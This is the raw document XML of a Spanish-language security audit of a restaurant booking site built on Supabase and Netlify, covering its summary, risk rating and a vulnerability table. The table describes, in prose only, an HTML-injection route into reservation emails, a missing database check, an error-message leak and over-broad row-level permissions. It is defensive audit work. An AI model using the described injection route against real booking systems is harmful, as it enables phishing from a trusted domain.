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Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5C3317"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">AUDITORÍA FINAL EXHAUSTIVA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B5C4E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Mesón Cafetería de Eiffel — sitio web y backend Supabase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha: 21 de julio de 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alcance: código completo del repositorio (frontend estático ES/EN/FR, panel admin, funciones Edge de Supabase, migraciones SQL, configuración Netlify) más las funcionalidades incorporadas desde la última auditoría formal (10-jul): precios editables, cierres temporales, horarios/aforo editables, recordatorio automático 24h y autogestión de reservas por token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipo: Pentester Senior (OWASP Top 10) · Ingeniero DevSecOps · Auditor de Calidad Web · Especialista SEO Técnico · Especialista en Accesibilidad WCAG 2.2 AA · Ingeniero Frontend/Backend Senior · Arquitecto Cloud · QA Automation Engineer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El proyecto llega a esta auditoría con una base ya muy sólida: dos pasadas anteriores (1 y 10 de julio de 2026, ver Messon_Eiffel/docs/AUDITORIA.md y AUDITORIA-2026-07-10.md) resolvieron ya el grueso de accesibilidad, cabeceras de seguridad, rendimiento y SEO. Esta auditoría final se ha centrado en verificar ese trabajo y en revisar en profundidad, por primera vez, todo lo construido después: precios editables, cierres temporales, horarios/aforo editables, recordatorio automático por email y, sobre todo, la autogestión de reservas por token — la superficie nueva más sensible, porque es la primera vez que un desconocido en internet puede modificar una fila de la base de datos sin haber iniciado sesión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El diseño de esa autogestión es correcto en lo estructural: token UUID de 122 bits (imposible de adivinar por fuerza bruta), funciones SECURITY DEFINER que son las únicas puertas de entrada, la tabla reservas sigue sin SELECT/UPDATE público directo, y las mismas validaciones de aforo/cierre que protegen el formulario público se reutilizan en la modificación. El hallazgo real de esta auditoría no está ahí, sino en un punto que ninguna de las dos pasadas anteriores llegó a cubrir porque la funcionalidad no existía todavía: las plantillas de los correos de confirmación y recordatorio (Resend) interpolan el nombre y la hora de la reserva sin escapar el HTML. Combinado con que el INSERT en "reservas" es público por diseño (lo necesita el formulario) y con que la columna "hora" no tiene ningún control de formato a nivel de base de datos, esto permite que un tercero cree una reserva vía API con el email de una víctima y contenido HTML arbitrario en nombre/hora, logrando que el dominio verificado del restaurante entregue ese contenido. Es el único hallazgo de severidad Alta de todo el informe (V-01), y su corrección es una escapada de dos strings, sin tocar arquitectura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuera de eso, no se ha encontrado inyección SQL, XSS almacenado en el panel admin (escHtml() se aplica de forma consistente), CSRF explotable, secretos expuestos en el frontend, ni dependencias con CVEs conocidas — el sitio no tiene dependencias de producción en npm (solo herramientas de test), y las librerías cliente (supabase-js, fuentes) están autoalojadas.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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:shd w:fill="F2EDE6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Estado general</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6606"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sólido, con un hallazgo Alto pendiente de corregir (parche menor, sin rediseño)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:shd w:fill="F2EDE6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nivel de riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6606"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medio (baja probabilidad de explotación real hoy — sin tráfico público todavía — pero impacto reputacional alto si ocurriera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:shd w:fill="F2EDE6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Puntuación global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6606"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">85,3 / 100 (media ponderada de las 10 áreas evaluadas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:shd w:fill="F2EDE6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">¿Apta para producción?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6606"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SÍ, condicionada: aplicar el parche de V-01 (y de paso V-02/V-03) antes de anunciar el sitio o de que reciba tráfico real. Nada más bloquea el lanzamiento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabla de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS orientativo (base score 3.1) calculado sobre el vector de red más plausible para cada hallazgo; "Riesgo" y "Evidencia" completos de cada uno están en la sección de hallazgos detallados.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406"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Categoría</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Inyección HTML en emails (CWE-79 / abuso de confianza de dominio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Los campos "nombre" y "hora" de una reserva se insertan sin escapar en las plantillas HTML de los correos (Resend). Como el INSERT es público (RLS) y "hora" no tiene formato forzado en BD, un atacante puede crear una reserva vía API REST directa con email = víctima y nombre/hora con HTML/enlaces arbitrarios, logrando que el dominio verificado del restaurante entregue contenido inyectado a un tercero.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85032"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica — antes de tráfico real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Base de datos — falta de CHECK en "hora"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A diferencia de nombre/teléfono/email/notas (acotados en 20260710120000), la columna "hora" acepta cualquier texto de cualquier longitud si se llama a la REST API sin pasar por el frontend. Es el habilitador técnico de V-01 y puede ensuciar los datos que el panel admin espera en formato HH:MM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8833A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuga de información — SQLERRM sin filtrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">"modificar_reserva_token" devuelve el mensaje de error crudo de PostgreSQL (SQLERRM) al cliente cuando el UPDATE falla por un motivo no previsto, exponiendo detalles internos del esquema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4C6E3E"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Autorización — RLS por "autenticado", no por "admin"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4406"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Las políticas de SELECT/UPDATE/DELETE de "reservas" usan auth.uid() IS NOT NULL: conceden acceso a cualquier usuario autenticado, no a un rol admin explícito. Bajo riesgo mientras el proyecto Supabase no permita alta pública, pero conviene confirmarlo y dejarlo por escrito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
